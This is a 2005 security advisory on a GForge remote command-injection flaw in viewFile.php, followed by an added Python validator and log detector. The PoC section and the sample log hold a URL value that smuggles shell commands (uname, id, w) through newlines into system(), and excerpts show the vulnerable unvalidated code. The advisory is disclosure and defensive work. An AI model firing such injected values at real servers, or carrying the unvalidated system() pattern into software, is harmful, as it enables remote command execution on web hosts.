
| Subject: | Gforge - viewFile.php security flaw |
|---|---|
| Date: | Tue, 24 May 2005 12:20:06 +0200 |
--------------------------------------------------------------------------
Vendor : Gforge (http://gforge.org)
Product : gforge
Affected versions : < 4.0
Bug fixed : >= 4.0 & Debian pkg 3.1-30
Vulnerability : Input validation flaw
Problem-Type : remote
Severity : High, arbitrary command execution
Author : Filippo Spike Morelli
--------------------------------------------------------------------------

--------------------------------------------------------------------------
Background
--------------------------------------------------------------------------

GForge helps you manage the entire development life cycle. GForge has tools to help your team collaborate, like message forums and mailing lists; tools to create and control access to Source Code Management repositories like CVS and Subversion. GForge automatically creates a repository and controls access to it depending on the role settings of the project.

--------------------------------------------------------------------------
Bug Description
--------------------------------------------------------------------------

The scm component shipped with gforge has a bug in the viewFile.php script. This script is supposed to serve a file info request, outputting its history, diffs, and all the other relevant info stored in the repository. There is a flaw in the file_name parameter validation, so a properly crafted url can lead to arbitrary command execution under the uid the webserver runs as.

Files involved:

$GFORGE/www/scm/viewFile.php
$GFORGE/common/include/cvsweb/RCSHandler.class

The problem is that the "file_name" url field is not properly validated.

$GFORGE/www/scm/viewFile.php

```php
.....
if($allow) {
    $DHD = new DirectoryHandler();
    $FHD = new FileHandler();
    $RCH = new RCSHandler();
    $CVSROOT = $GLOBALS['sys_cvsroot_dir'].$cvsroot;
    $DIRNAME = ($file_name != "")?"$file_name":"";
    $DIRNAME = $CVSROOT.$DIRNAME;
    ....
    $RCSFile = $DIRNAME.",v";
    switch($view_action) {
        case "l":
            if(false === $RCH->getRCSLog($RCSFile))
                echo("Error: ".$RCH->getError());
.....
```

$GFORGE/common/include/cvsweb/RCSHandler.class

The RCSHandler class takes care of managing the RCS log and diffs for the requested file, and it is there that the malicious code is actually executed.

```php
......
function getRCSLog($RCSFILE,$REV="all") {
    $rev = "";
    if($REV != "all")
        $rev = "-r$REV";
    $file = $this->generateTemp();
    $cmd = "rlog $rev $RCSFILE > $file";
    if(false === ($result = system($cmd)))
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    {
        $this->setError("Could not execute '$cmd'");
        return false;
    }
.....
```

By system() the malicious code in $cmd is executed.

--------------------------------------------------------------------------
PoC
--------------------------------------------------------------------------

The analyzed command is "uname -a;id;w"

gforge/xxxx/xx/xx/gforge.log:xxx.xxx.xxx.xxx [xx/xxx/xxxx:xx:xx:xx +xxxx] "GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a HTTP/1.1" 200 2977 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Maxthon; .NET CLR 1.1.4322)"

----- "file_name=%0Auname%20-a;id;w%0a" -----

%0a[A] = hexadecimal code for <return>.
%20 = hexadecimal code for <space>

---> "file_name=<return>uname -a;id;w<return>"

Looking at viewFile.php sourcecode:

$DIRNAME = ($file_name != "")?"$file_name":"";
so $DIRNAME = <return>uname -a;id;w<return>

$RCSFile = $DIRNAME.",v";
so $RCSFile = <return>uname -a;id;w<return>,v

...

$cmd = "rlog $rev $RCSFILE > $file";
so $cmd = rlog all <return>uname -a;id;w<return>,v > $file

if(false === ($result = system($cmd)))

and then system executes:

1. rlog all, which gives back an error because of the non existing path
2. <return>
3. uname -a;id;w
4. <return>
5. and eventually the last part of the string, ",v", which gives back the error message "sh: ,v: command not found"

--------------------------------------------------------------------------
Solution
--------------------------------------------------------------------------

The vendor has been contacted and they promptly worked on a fix. At the time of writing the debian package available on Sid (gforge 3.1-30) has been fixed.

As a temporary fix it is possible to disable the scm component. Or just upgrade to the latest version.

regards,

--
Filippo Spike Morelli - Miu-ft System Administrator
....................................
.... follow the white rabbit ....
... wait no, follow alice, she's so cute...
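An added example, not part of the advisory and not GForge code: the allow-list check that viewFile.php lacked on file_name, written in Python under an assumed policy (relative repository paths made only of `[A-Za-z0-9._-]` segments), used both as an input validator and as a detector run over constructed Apache-style log lines shaped like the PoC entry above.

```python
# Added example, not GForge code: the allow-list check viewFile.php lacked, used
# both as an input validator and as a detector over access-log lines.
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed policy: a repository path is "/"-joined segments of [A-Za-z0-9._-] only,
# which excludes CR/LF, whitespace and every shell metacharacter.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9._-]+$")

def is_safe_file_name(name: str) -> bool:
    """True only for relative paths made of safe segments; "" means repo root."""
    if name == "":
        return True
    # An absolute path yields an empty first segment and is rejected as well.
    return all(seg != ".." and SAFE_SEGMENT.match(seg) for seg in name.split("/"))

def query_values(query: str, key: str) -> list:
    """Decode values for key, splitting on '&' only so a ';' inside a value survives
    (older urllib.parse.parse_qs also split on ';' and would hide the payload)."""
    values = []
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if unquote_plus(k) == key:
            values.append(unquote_plus(v))
    return values

# Request line inside an Apache combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
def suspicious_viewfile_requests(log_lines) -> list:
    """Return (target, decoded file_name) for viewFile.php hits failing the check."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        if not parts.path.endswith("/scm/viewFile.php"):
            continue
        for value in query_values(parts.query, "file_name"):
            if not is_safe_file_name(value):
                hits.append((target, value))
    return hits

# Constructed sample log (IP, date, user-agent made up); line 1 mirrors the PoC.
SAMPLE_LOG = [
    '10.0.0.1 - - [24/May/2005:12:20:06 +0200] "GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a HTTP/1.1" 200 2977 "-" "Mozilla/4.0"',
    '10.0.0.2 - - [24/May/2005:12:21:00 +0200] "GET /scm/viewFile.php?group_id=11&file_name=src/main.c&view_action=l HTTP/1.1" 200 1200 "-" "Mozilla/4.0"',
    '10.0.0.3 - - [24/May/2005:12:22:00 +0200] "GET /index.php HTTP/1.1" 200 500 "-" "Mozilla/4.0"',
]
```

Running `suspicious_viewfile_requests(SAMPLE_LOG)` flags only the first line, with the decoded file_name showing the two embedded newlines the advisory traces through to system(); in PHP the same allow-list check belongs before $DIRNAME is built, with escapeshellarg() on whatever is still passed to rlog.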